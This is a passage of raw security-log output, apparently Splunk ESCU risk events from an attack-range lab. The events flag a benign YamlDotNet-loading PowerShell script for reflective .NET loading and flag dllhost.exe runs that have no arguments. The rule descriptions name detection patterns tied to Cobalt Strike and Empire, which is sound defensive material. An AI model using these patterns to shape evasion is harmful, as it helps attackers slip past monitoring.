$MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T16:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T16:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664992532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T16:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T16:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664985600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664985600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5892", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664988932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T15:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T15:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664988932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T15:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T15:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664988932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T15:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T15:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664988932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T15:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T15:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664982000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664982000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="6084", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute 